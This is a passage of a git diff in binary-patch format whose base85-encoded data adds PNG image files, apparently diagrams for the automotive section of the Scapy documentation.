zWjg2iT6LZYFjr!fFm;&AC8ZS)LXuT7B_*4N-kIjtY?VHb01H|r^NJW0u9d&(j%2z0 zhFI}a;o$IN^rOv*Zx@^Mo=We4 zt7FXTxe{rvG$}Me&yLy2t(Lf-dRH9o{@ob7;dOE&Mg&?~DfyYa^rl zjVu=i>qn*CZ}>L7-AseX$({&!^646#(T1~;?MXsRdkK{N(0$pVCSd$!xI<|B$XH(k z>Y@O!1#`EJ7$w$j`6y@bNWdL+=rRou)Tz__zZ(^1z`cwKF{6lQJ*4{&xOhh{eyLxm z+2gaGfsNB6XhFAhUf9R3nb+HT#xUY6ZA#AeC?t!ZShR(uaU2QTWU&QdPYteHy?>u3 z0IX7;d!ip*ahZ?@@M#Ixp?f?)Yc6|b@bWhI2=wLS*CB!~(o9!H6Gc$b(y}KK>VbtZ z_M+vxM#kEKA%3o;%R8*EDQ--xa}rZR#Mw1mv$2v_YyP(dlHVPI$#O2O`wFQ7Y@bo)!AV_P$L#Mca$^@)dig z6pGwHET)(7*onVcG1>96B+DHr2bk1PwFa z7{>Q&7@SAqnG+C6P-FfxkiYG|=lBxWQ`{`a!6vYOXxgTAve$Z5AA}IJMEEAzA9c_V zDb{Prj7w)5>!{{{R*~y=RQ8t|y~mQZXhByP*Ds0&?xs>69Mvkn+~5CDNpbhQ=a<{~ zi|l)zu+f$-p`l2_y50SUF_pXpibH7x?w*Hc@Iz}I_G^K2Rebewk346#Ffx~!!9yXl z3|R@5nx8;~d^u(R)zBsM+0k3T|2l)zGP3g5<(cle+At zKoURmP|8NvZZbD{Ib{iHCW{o=9_-b|pMLm?u&=M>2@dwa=7PjE(xpv=8R3ziGOPo3 zWegd(}z6Wcdlr^i|vZAMN@UYLIYUj+mahpD_p2U8z zR;q|Wa?WIo1&!@>PHSE{zMr1Sd6ka^9X1U>GV@vXgGR1i3M_)?pfp-?IY_`;v+Z~sq8}wvW|l`sIGtB zZ}?&zS=;mC0Aj^MhmvFll-lqYDMhzD&?P=ZUQ#yv*>aM|JO<}KXcWBMf3BG$A^Ye& z2-zmqnAEjCV^bc9n`ck^XdBp#bXiO0hsus{pnG`x{I|OO6QN(fKA`FG+CR`|gl@a| zAPz=vo&u%F??T}N>F7e2+VoeS^={aOCBnIP2=OIJ(61&we^tb2K}}jcd<8bU zqz~?7^xEfqq@(Yj` zwzMEL;Kmj1;y+okKu#olnq^QCA}Vt^GBk z8v)|)K6*qS;JDv@oMos7Mv!J`=6J7#_ml)SSO~ZR(A@wtU?RCdm^&~q4{${ZJ%XkO zm?)J6k{UM4Fh&nt0gPaM37F{XEXLyhkoI4NYrUPbD#TtTsvjA9q=(ae=2B(c$bYM2 zuKoQpSZ{kD;49c@951VnzF0e4w6kqo!kz6K820-;j2ZH*=-nbLUNk8|2@-`1NQ+VD z9x$D(TEO0NUh5rQBb-8CFHwEFR%tdl=1dji@cAI^9>z-m?)q65C;1H4Z$Mf7MOIU4 zlM?FOO=J6i3D!o~tRDW;{Vrz3g7)c`1(~TGBU9kPn{W6*yS5T>>0YKm|44K~cF&Rm zym$e-B3~)7?C@5Oz!_O(?_w6dgq}G^MM2_Eclx=9z;+u&mALPFCcI_jhL*9)@xL=- zUbgA>5$|^k^9fn@5uWMNyTqwfKjm3Bb13#i?l}0z^K0^qIR&@e9!hkm3Y7Fx_~# zpw_Et%Ta_^`OKrjd7aE9^yPOye-8#JPfgkHqkNR*2}~aeEaiJH6Y; z8Z1j=JIEqOEukkLPzQfI`wxaQhdz6F+Qg>*oYT9A=$cym)s$%Z+rEZWRMBMLeYE_n zI0J5SbiJ^O3=wjD9l||4s$sV;|NY!<@wBLT@h|da^KdG6^)H(68F#xzE-7l4dz^=q zoT@y}+v`CEFYXn+(FVVH>JPZS&}0oz3WOpUFQujl7}cBm{7s%yzoC(3qqgj<{VF>m zCf8`B=|B{EOx`Qp2M6sQl9LkliR;pf?tYP;XYcdwY>1=`S*uM=<^O()=@*km-jXo& z@ChDo`YE^Xx0<^0uIG zAy3iG$0uw{TaM3+`#tDT%RM;+wXC{KkY0qw9S>XTft4{qO%wwg(~Xi_?+-mA#%S2& z1B6ZzfJE!vl^VKcJ^bN$welHtgKp2xOV2xxrSXTR6cIaJ_aS4Q>|EYEVEkpix( zJ*US6VC=Zjzu+P??a;NTsQIoI2PLfTs^_Z1TU)2tt5nGRF2Ha@205yc_bth{8^tgC zOnLcGHk~7ZXK)B;gV_bt=5?zt;lzJPV*+rg^Qd0s2U&mz$*k9P8!Ma%ezzmmLtF91AE5c+M>LXBo_pXhGmKGTi|(`a#V z&9$DZEu8=YBOow*Sts#+tD=DWxwuA2Z6H8++vRx>WBF2zc3W(Sga+S_A6EhO0ftWq zr^d9ZO2C$iE&i4SVp>DgM6bjArQ;}@j-B_)<0dG%rHK>De1!{8VFye)-_tdRw>Iih zZ*x~@3cuv?0CY3ZRNc{}3E)zf@X9YM1RbfaSCLI=#!ej{0#XqX#}VhNHoC~Xteg|N zFZ%RE$(co6XBsDaI_7UR-Pw=;44TWp*_!mMc0^Z8+>vu?(;6!CI9Nq#%Hm*NB3`fi6I7mwyK@PseB!Fx!3DIzx{Dz$+`TIiJ7$ zpDF+UVQi;2zW8z9HiNuWQc?Ww%RS-ZNpi#%p)&8r2OcAH_u{?vnfw$_$KCl~OTKga zpL}0L6L#IU_VRudXgaxqazXq>49aPqr`<%nTRi+5Zmg&kBTL@fptSM&jO9Ttt(dpt zqQw@61#VmC3=NSsv&sx6g~i=uWRIv5Ozyys(wJM><&|3{a9fjI=O!`OFRiE4kb#{3 z#ARcU?ppX+zvWL`dDh#5O^z^1jqRR4ZdyW=;vHYL{C2R5UCQy!=-uA#=Ot}oqYl%{ zsa+`Z!a8-V$ouc_@Ee%Nn;|N(G1~>d%HfR|j!P2Ad3H=CmJx^ZeZ!OY9QL}cuEb`t z2Fd0vfdo6kj}Wzj^P8tBM^sK=JlQ=&yo+nSR@-LN;r%u%q<>{wR)QF87Ij#4E@{C} zM{zBvderelG}65K8F=l0%`UH@$f@L>bH%Q&yBVIq1}T2?9KTV5EK&SwWxFrxps;sh z5{TN(bxW-1DU|B33MFR|x0MrlAhy0Q+6pJCVAnQ7Y&Y&d=OsTEd*2z0NBKmCdZ8V% zqaT;Qjj6&qrL<`Ri_8D6gZJFyS}5Tx=vJYd^}!n&RWx_D(Y+Fv(hho ztTfV^^UYqdRka5r!@OP7Q$IybD)$=VRs1yj`b>-}a=WpIU1ls7IgQZ{lOeA~-vhaw zDFG8pcqoD0ZgP3|`Q@7Z;z7r2yskW=Qm=f{(;B0my&>L!45@NEqlN(U!v4w(~Y5?ZDlKO@R zV&Xq0yRco757+j@YQ@ImkR`m$AKdee5k}E}?SzodpxdT!-SK{@;RbX(rni8W(q4~= zZIrowReUn57{{KUS72p?WkR{eed0ymg%hXLFkrzGqc`#I#f|MqH07% zR9<=F3SQc-_L4Z&;haTCKbdbv-qxJ9{4s)H9$RM?q8-6Hz?YeY%nHA6zwqk`m{>0P zn~Z7TUk_7^zi)3yD{r{<9_V0}@l$hu9I@c%5p<%2PHwvrylsuo|?t%5n;Gp3&$k@#N~w$=Q0W%_-*Q3CGw*A0z9XjxOHa zGho9*LU?x9jaB9yH+X67?^%M^O3>{U%aZkmL$|hb94|Wd=gmjXG7l_6zi|f#x)7is z(yI*P_QUDjLWm2Z3ajv5qG|&?O`vHXyD8JstZ0kgv0bpTX(4uRTkUyTtq)d>Pz`xA zhwuYk{OOF~Sim6F%`dY3Bqp|B6p5@hGsea>^_$|2J*SeP<|8UY zaL*0WS%gBg1yBN*7EZZPuUr2$xEtZ?WDbA8<7Luuh-Ze}a*=$NERu&7p8WIpK9IY4 zbb}F*CgAC#DvFxppQ-KoYnWX1tvVOnqN=&(wz0Fj>@-MsM%~|{9!Yl>*Y2l<23W8= zvqOLzzuY-=)zG~r)Ld;3lS+95FMb)LA@cMRMA0M&2E^R%C#8)qr&o9FYphkkA#a3C(1N3Xm-xj}>qFTGVzFBZYOLq5Em3ANm8 zp(n(Amt%!s$jr*WCyj)4UgJ|K4HgB+2QTTyRx^%H7i@b_kqY2}#f+MfC?17=B+v2@ zVNexhfL~K9H*FGnFCwI`OU-5GQ4lXw4?SyggBuk+gv@SF>mepVU_Wtq`}`9 z!s}*((p+u12E0~7MkrM&2U#I%GgeclDIq0g#=o2-@x7~-g_d`QL{GwPy5AS5j`nZT z#TJ?4MqO}4U)epcqId)5ZjED%PJs@wjVvj7LJVGr(_)Q zc~WsCK(WNN=4$vu9zO=wS2!lDljCsJYnf$=@as34*~R3ITMSG-h7~?OD^YfVFsB}M z;-mg*%flC}=0W%54_{oK5o4=ao|pFp4CeD}G2;7OeOv(kx$X{33{@ujSMKtlIZr}I ztsyK{+hv^tK9}4T{Y;^oJ;}Ucy1J^Zi|{oPF%Kw1`!ew$(m>dTB}iRant z;kCXJQlLpMj{F}DRweHj%(wQlRf)dAh6i!}0|h$B-5pf#&dKP1RaS3A9U&zSw&WlF zG@Vy>=zhh-9&EV|ga+NLy=!u75J?Ai$x^N6gQypOhjRGWgyjmdAsyWx0-P$) zQ6yc5tG^;$o>?YVEft*`*HoVh9B~nAZ1s+OryS_g+IQxtUux6k#(q`kDc<9oHGpZ6 zlOjrv1ip5Rh0B<@KrQ%}+RbvpDQPvg+(YNjpzw1qp74lPPOMEzzFe63;m>TQB)#HE zkEoI%@u7ZTde-?+O`dEvoG<_KeKgNxI<}Ut()m!cyCQ3u4edLECeg^e1ZcRo8p6r5 z{(I^YoZo4RNBLa#3L^@=x-5$oxukcMcxGq!kC9P^8b5~}DI(R^X}hq?s!TPjxIz{- z`uDf3{aFNG`zdcB?~ZV$jZk9g=YOont1omYqY3O*Ua{2I3}hZMIqc130)G0Y z`z0-|BzAa)ESziduDnvxngSi3U zPk>PSj=za;v3`;djJX!+#(Z|d?fL`QJL_9J%S3kwW)HDu4z@0?swbcLDRM#K68b*F z?3BUaYvX3cP+_mi_fA&qE8qW&a~yF$GQjhmn{XAfD~R&{sA){R>+~P7DCm3Q^58?Q z-ke&MmLWzS^_ximUY&M}F}A6Sxf>4mXx=V-@Y^|u7BngS+6e90uHG7+i2WoZIpKK^ ze|oS}vQU|XR^qNU0{zAogs;$*l$msmbub#d=a=zsK& zrvLJw1K|Kb1H=79R(7mdc}%l+nJx3jvFD#)%gtcDiF3PSUE}$2Rv%v({t8HV=W2r$ z4ob?4^bfAgpOj(Q8F3`l?fN>o*o@)tM214#W2~g5D@wcNt|GCOGQpy(kPjXYwDH9g zbEM?RUy9Dw^>MGCT&g^W-U5nXvo~0W z4dSWIir%hOr^CqUh3qU5(f^9xD%HI>%xE0W)!W5XZG^$Mtdr{>x|HlOT3VLLbq%e0 zGqOj9qUfLR2)tTqx|*BperFVD@|R)5tqO5fNP>>W--&QHoit{ zMiZA@>CPNSgbXoefZx${C=^SY!4dX9J#TQ$-69wlPEBXj?J?C_REkcRXKlC?rSnFqpO^(G~kLafu$Fog9o34SD%%?7{pgq#K6DDXnly3l4l+7X*l$)#NYuMp>H@DUzecKV#}>J+t@}o=~oxEyKgm`BsDFa zppC_}S)Pm&F7qox?}J)aqBgGFH2g452gM4sdLdf|pLJ=U83(Jjs^N^S006T|vTBy~=)OQj zT+3%r*)#ol>-t?jj`8Z(zo>=3^qtVG5J)XMefQp8T2mY(+W%2zsQOHHu@a`zt*!fc zRORFCUvZAjp_R|!K7hoX=C=)bzdt%@T3Yt!-EAsZINQ6q;rwKCMr~rRy|AkfY8J*J zF#<#*4x7|#Ha(sETpGLBIF0@;2@ogPsX3V#E@s5%U?BDJh7MI58Y~)Rhd)h-*?G`b z(C5wqoS=ul|Bx27$O3s51SCYb3uv0-NnhYBKoaGcO)PB9iaxZc;VVEwBv|w|ehK>0 z1xTX&1Nd6+;r02N73G11$d8P37a+CiV?00-bL=m&7lxMIvqSvI@}x1TB9QcjOB7R^o^^M`wwIdH zvc>^KBAN50ras^>?r6mb;Ma(z|PX5N|Su^#6+gzKv$?gMy=8#?3oe%n8_S& zc3yfT3p1FTS4fg-{LKTqF7WI#f@jXmK^QIdR9UWO#f@gd3$ir$hbEez$V55#5&HIB z2KCtO96{oQ3^DGqVHrAtFw1ZGt@{keIqH#DqJc2|AfSWwYqi*`;rYG)&!5ZCRn)T| z8@0mnpNxEAsPj0Cz^eP^MHBXctnShPGu7Pk~;TCD#+v606+{X@DxuINF_jO}#1&4Jh=G4M#!7qXqQ_B*KP^gnd00RcN3#L>`V zI;(ERz0M7nh-<>Fcze@}yE?x6&C|vg33_bq_t;?mgK(vvzjov``?adN-{2Q2A#efg zs%5HuA+y=d!o0!aIySV&Ylx}S+=tRVvFXk1#*T&f;gLn-%@a78_))JFVs<^^#rU(j zr9>|5Lk7gREZe&6LtP`IgBh>aF;m#T>1NP_2&p3Vp;U&Tg2Lim1oA<(MJi~uE9l1R zDlg+lGN1S@7*!Ys180->W*tk@rbeorD&?$l$raTd?hf;BzYF}OTRK=q5d1(IT!W`D z%s(QfJg>f+8v1~TiTOPVp^x8-@NU5k1B0D5kqg3sIOZ>dH%#i}uj%%CWP2^|Zx@*O zjQw5MNjIU+vw9a_sgF+`T+k+X+Cm<3Al9Glf6#$Ffi<7i_03^$l7WtXxD)u@;mslj1OMy+XVo>oT( z9CxG4+V-Kf{36|*<`Mj56n7<~cG`mZUzK^amE@p-kVE4R&c2k}_|)mkAcj6Mfaw7h zfG-my@)_RIh1Zpkgvsh$Pt3okbR`B(b|3dL#wBknli`jSkD@(3 z&EE*UvK4E{_ zpG}rLwwghrxBeEm_zAeL&77_k+$$X|z~ofhdagBpJ~I(WC@p?s@0Z>;1rc0zu{<}) z)VX`;r4wAZ<7_A8Xysj^Ig{@zYoLRXFrxLkph4&gYcZ?Ok7?vlCrJ+plGmq+ma*HxO@! z^gUE%IHW{zc>f$2dUEOS18L%=@52SyZka=NH^{Sdl>Uwd^db|^sCu^HB(PIDYJsrn zK$p%t?6v*-#=ddFQXcoXtSmCO09z#uG56wA9T*;#Q-i)UsV-s0m>Xy>Hd#E)9L%|s zT6;6coQ<%HjJct&ufMvP8B!;w{!>n5zDO0)RGcFvh3TTYf~|+o430*pH)SmA-o1bG z`Rmqpp|8|RR}GGoo3;w0^OE;nN=b4M+Sxg{b{XP_F5AoMv)~?BY1LFqOBx&=5;<^u z`4FupbFz;8A9MPE1u}H$*dNmvQ}5{ff9aY32S@AsJ*$W|+%`J~3Rg~9)Ixz;9DtQH zw{QM~4+1iQdL8Nyz>T$IaBz$JAGk1U_rJ>tKjwHAxF=;m{_2YTj{DBx6SE04G}5O4 zGNV2qhKRvFLjoJMK1ovpJV3`-`M9H}e~=ne^Mg7)=`sb;6q~xkf%*fR7O^CYU#86I zK>z4&N!t`db};4Xr5EnU9QTXE4oYKw&@_F zw=N&T-rQ~shMxh(oHYdY;C4HAz9~QV$}ca+o#$gnOO@iI*CA(mG}eCZmP9yYNlM+k z%2W0V4pm{FAtl@4cYUKKrG=u}Jx8-O;;tT)yLqUHlY!D1nn%>a>sO`xo+`Fbogc~M z6^}p2uh0r%4{z76*87+Ny9_UcFmiFl*|~)B$1Jn6NM}y5fkR1^Sc1H#o7jGM?wlw3 z5HdY|VMb2{)W{z$|516${?Nte<3exeP%8=S0USL{OU@*XhwVzQIAS>5f}|{ z1N$V6?BxD~Ll)M1$dzg-$Pq5=?lkk++}b)WSJSPUV5z#_R<>!Bp68igLK8IuLtuw_ zWuac0r|?@62NJK+oK5k)T}abbg0!+wipHNvd63dW6JQO8?wyyWDS};5xb0JQyU-G0 zQH#yiv<0ZQ6vqBgZe-R`!alJ16EFyLG*i|VyAnO*t1nK3?=-+0{l@c3|7M*k-{ zU_Gk=+%-6NBFokAGbmS=6(-6!k0>Lv7ZX4BP&)eWRVRcEH_{#T(Y3$tJ{9W{4)wo_gON;8BYpxdW3mv+%=B9ZH{GL+8@kjPDM2cx; zk5pS14>x7L%ErM+Lqj*Dd+&~6Ii#h@PwW{;g&U%(RJWuNH|nLy_vj(?rh8tc2~0Q; zEe1TQsY=T^qT`rIsTMNvFY?i4F2CgH)^h1E4U}gNx=I3{qPfLF6_)d8q4P#eJ2T6x zT1C=h=^Eu7w^nUr`5>_Ps{@YUs&~r`i$x|o9T95WFr}QbXDItcx9=JKFTT>EqDR$a zE)6EZI@jBxgItIfi+0U*@=_~aEH4n-Z70If2-YPunEyF>^GW^LMh%*PmwwZyM@vKDra{_u(K zYxize(3C@a)#L4*cbaKf!<#G1181fw*9{1^J2fF^P;+6i0$?ePF_zJCUInBQD8vgu0XU~=_*tYc9KE^{6CZ*l`_9{>4(=z6!Wg&r0)uc+Zra$!SiyFrr z^9l(l1eLs{gkVv%*!qTb8T*OyS|2T@*oi&rA6(*>cPlVabnNo5?YN}hmk_Vwp66OL z%cK0z2kxwGwy9iUqM%BQaI6u#dE0;)LwT~$j207l`x@iOn86UhRhHd+fMKPvW}w=f zWd_VDX}dOl2Mis9pya_GYQOPTI6??>G*p*u)nY`6SJJ;2rSOsPF@$L~f*s8Q67g~BUk3c$*QAp9uR=>|@;ZF=!A|2Rhe35Wfocicg^eVEX?km@r#*hY`U zr@_Gmm4!+-56pax7K-_R_su6M2lc;(89o5JECXe)G*{d$v5Y+P4c_e+mZC#b{tEOzIW<(H6|uZ}CrhB* zEKI)kMHqH@X%!o{oAk8;g#RW{$By89#vO>;jU4^R+YQlQUUU%juf|@y=v)1;%Ti<8 zuXjxJ`leAT|66a9#(fh{NpBOvn;xMER*0>*o4m$~*G?!@g=Zg5c^=PG*JRx1JiT`G zsL_gNq;ebNxNesyJlcb7Vf-`@QhADI`6`t}P0NvR-VDtY{>94v^;Gy~rgKQIQ}|To zEr7Y1byhLSvsRVcJLqq_2TocBZUAYO_*s|7#u4p8;(P2~{3y!e-X`O~uJdBZc^*-l zx9FShMBkgtRfgQ$6h@i^9>5<2eDx@n7r!OZInrwl*ws6 z0ZY;!SsL)P^hx-Rq8<5A^{{N2U0*U0rg01uKm&&<5=q2A*=6Nrcb_Mjcp~;P+arwE zs>#5KbHIsaMIrsYLoL@}E0kb~x_X;xXU{{byg zOgr%TUkb;b2h*aSAMQ`7s+m?i_HU@-qEbZDA`J4CVGD#+cN|j~F#Zd;u~_GQ=cqd8 z4E1<`8Oa~y_xkxGc{SqGi}#=W^Y=Y9bXM=*?-%bY)zKsVuS1zYJ@0?rLztseDGK@< U%rsx+sms^B|L9)HUF*RA25P7jiU0rr literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/ZGW-CAN-Bus-.png b/doc/scapy/graphics/automotive/ZGW-CAN-Bus-.png new file mode 100644 index 0000000000000000000000000000000000000000..80a3e9c51c920448097361909b2265bb30e5ea29 GIT binary patch literal 62113 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 